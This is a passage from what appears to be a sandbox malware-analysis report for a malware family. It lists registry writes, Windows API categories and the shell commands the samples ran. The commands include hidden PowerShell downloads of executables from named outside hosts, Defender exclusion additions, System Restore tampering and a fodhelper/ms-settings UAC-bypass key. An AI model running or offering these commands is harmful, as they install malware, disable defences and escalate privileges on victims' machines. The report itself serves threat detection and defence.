| HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::filetracingmask | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::consoletracingmask | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::maxfilesize | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::filedirectory | %windir%\tracing | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasmancs::enablefiletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::filetracingmask | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::consoletracingmask | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::maxfilesize | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::filedirectory | %windir%\tracing | RegNtPreCreateKey |
| HKCU\ms-settings\shell\open\command:: | "C:\Users\Public\Libraries\svchost.exe" | RegNtPreCreateKey |
| HKCU\ms-settings\shell\open\command::delegateexecute | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\explorer::slowcontextmenuentries | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\content::cacheprefix | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\cookies::cacheprefix | Cookie: | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\history::cacheprefix | Visited: | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 쉝琡泻ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | 桏 ⬉ʾ먎Í䈛x茣ǧ䠱O噀ñ뽹ɞ傄ë횎ǜɼ鶝꾢ʊ캱閾ʴ淃⟋ʪ柏ũߙĤᯢV⣳ġj ᰂŁ鈄Ğ鍂ꩠŖ窵ň | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | 桐 ⬉ʾꄍ먎Í䈛x茣ǧ䠱O噀ñ뽹ɞ傄ë횎ǜɼ鶝꾢ʊ캱閾ʴ淃⟋ʪ柏ũߙĤᯢV⣳ġj ᰂŁ鈄Ğ鍂ꩠŖ窵ň | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 騿琹泻ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 姊璛泻ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ⏶쁣紽ǜ | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\run::obwallet | C:\Users\Ymoxotlr\AppData\Roaming\ob\Windows local.exe | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 빇듂製ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings::enablenegotiate | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | ⇺訖ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 䞀⇽訖ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 졯⋀訖ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ⪖⋃訖ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 뚾蹸ꛗǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 昛躉ꛗǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\control\ci\policy::vulnerabledriverblocklistenable | RegNtPreCreateKey | |
| HKLM\system\controlset001\control\ci\policy::driverblocklistenable | RegNtPreCreateKey | |
| HKLM\system\controlset001\control\ci\config::vulnerabledriverblocklistenable | RegNtPreCreateKey | |
| HKLM\system\controlset001\control\ci\config::driverblocklistenable | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 꿖軴ꛗǜ | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\run::obwallet | C:\Users\Fwcujizw\AppData\Roaming\ob\Windows local.exe | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ᐐᯛǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 牓ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 㖾᰿ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 烅꜊옚ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 烅꜊옚ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | ܕꞣ옚ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 楮ꞥ옚ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | Ɪ옚ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 㩺䟆쨪ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 衫䟔쨪ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 䟖쨪ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 騘䟧쨪ǜ | RegNtPreCreateKey |
Windows API Usage
Windows API Usage
This section lists Windows API calls that are used by the samples in this family. Windows API usage analysis is a valuable tool that can help identify malicious activity, such as keylogging, security privilege escalation, data encryption, data exfiltration, interference with antivirus software, and network request manipulation.| Category | API |
|---|---|
| Syscall Use |
Show More
174 additional items are not displayed above. |
| Network Winsock2 |
|
| Network Winsock |
Show More
|
| Process Shell Execute |
|
| Anti Debug |
|
| User Data Access |
|
| Encryption Used |
|
| Other Suspicious |
|
| Process Manipulation Evasion |
|
| Process Terminate |
|
| Network Wininet |
|
| Network Winhttp |
|
| Network Info Queried |
|
| Cert Store Read |
|
| Network Urlomon |
|
Shell Command Execution
Shell Command Execution
This section lists Windows shell commands that are run by the samples in this family. Windows Shell commands are often leveraged by malware for nefarious purposes and can be used to elevate security privileges, download and launch other malware, exploit vulnerabilities, collect and exfiltrate data, and hide malicious activity.
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\36f6413bd3ca800dfc66725d52421babc85b9619_0000793088.,LiQMAxHB
|
"\47F2.tmp\����.bat"
|
C:\WINDOWS\system32\chcp.com chcp 65001
|
C:\WINDOWS\system32\reg.exe Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
|
C:\WINDOWS\system32\reg.exe Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
|
Show More
C:\WINDOWS\system32\reg.exe Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
|
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\0bf30a10a614207d27df8c8fc8e7b50853a52cc4_0000793088.,LiQMAxHB
|
"C:\Users\Blotfgdv\AppData\Local\Temp\vcpkg\vcpkg-2020.11.12.exe" x-upload-metrics "C:\Users\Blotfgdv\AppData\Local\Temp\vcpkg\vcpkge09bc766-dbad-4163-8882-9ef5df4a2b81.txt"
|
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\819ce40e357612584bd690fc220921b9d4a8431a_0002931200.,LiQMAxHB
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://frozi.cc/Stb/Retev.php?bl=RbAFzBhyyCMuMHbMdPLCW013.txt' -OutFile $env:APPDATA\BK245535.exe
|
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\7107fd33026804fb7da9494d952a46d036f49200_0000828928.,LiQMAxHB
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK707028.exe
|
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\075ce8c6a8190bfa4f9facbb57cdc728e7ba52ea_0000828928.,LiQMAxHB
|
(NULL) fodhelper.exe
|
open ms-settings:optionalfeatures
|
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\15298859.ps1"
|
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\15293484.ps1"
|
msiexec.exe /i C:\Users\Vdwyojnp\AppData\Local\Temp\MSI2FE1.tmp
|
C:\WINDOWS\system32\tasklist.exe "tasklist"
|
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\b93dc317de9e6f50f25d83df63c6d107591118d1_0000793088.,LiQMAxHB
|
open powershell.exe -Command "Add-MpPreference -ExclusionPath "C:\Users\Ymoxotlr\AppData\Roaming\ob\" -Force"
|
open C:\Users\Ymoxotlr\AppData\Roaming\ob\Windows local.exe
|
open cmd.exe /C powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Ymoxotlr\AppData\Roaming\ob' -ErrorAction SilentlyContinue" >nul 2>&1
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=yQbDrnzZVH6cCtokqOPRE001.txt' -OutFile $env:TEMP\BK396126.exe
|
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\96c7077d1b99dca84e7f3b5a89e58cb608153ac0_0000843776.,LiQMAxHB
|
WriteConsole: (NULL)
|
WriteConsole:
|
WriteConsole: __ _______
|
WriteConsole: \ \/ /___ /
|
WriteConsole: \ / |_ \
|
WriteConsole: / \ ___) |
|
WriteConsole: /_/\_\____/
|
WriteConsole: X3 SOLUTIONS
|
WriteConsole: External Loader
|
WriteConsole: ----------------------------------------
|
WriteConsole: Username:
|
C:\WINDOWS\system32\getmac.exe getmac
|
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\2160328.ps1"
|
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\2155015.ps1"
|
open powershell.exe -Command "Add-MpPreference -ExclusionPath "C:\Users\Fwcujizw\AppData\Roaming\ob\" -Force"
|
open C:\Users\Fwcujizw\AppData\Roaming\ob\Windows local.exe
|
open cmd.exe /C powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Fwcujizw\AppData\Roaming\ob' -ErrorAction SilentlyContinue" >nul 2>&1
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Fwcujizw\AppData\Roaming\ob' -ErrorAction SilentlyContinue"
|
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\d661cd9180fefffa8ab4fd42ba8695b485944458_0000856576.,LiQMAxHB
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK216633.exe
|
C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.online/Stb/Retev.php?bl=hSoTjMPgKZmtpimvUjLW012.txt' -OutFile $env:TEMP\BK598146.exe
|
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c cls
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.online/Stb/Retev.php?bl=hSoTjMPgKZmtpimvUjLW012.txt' -OutFile $env:TEMP\BK598146.exe
|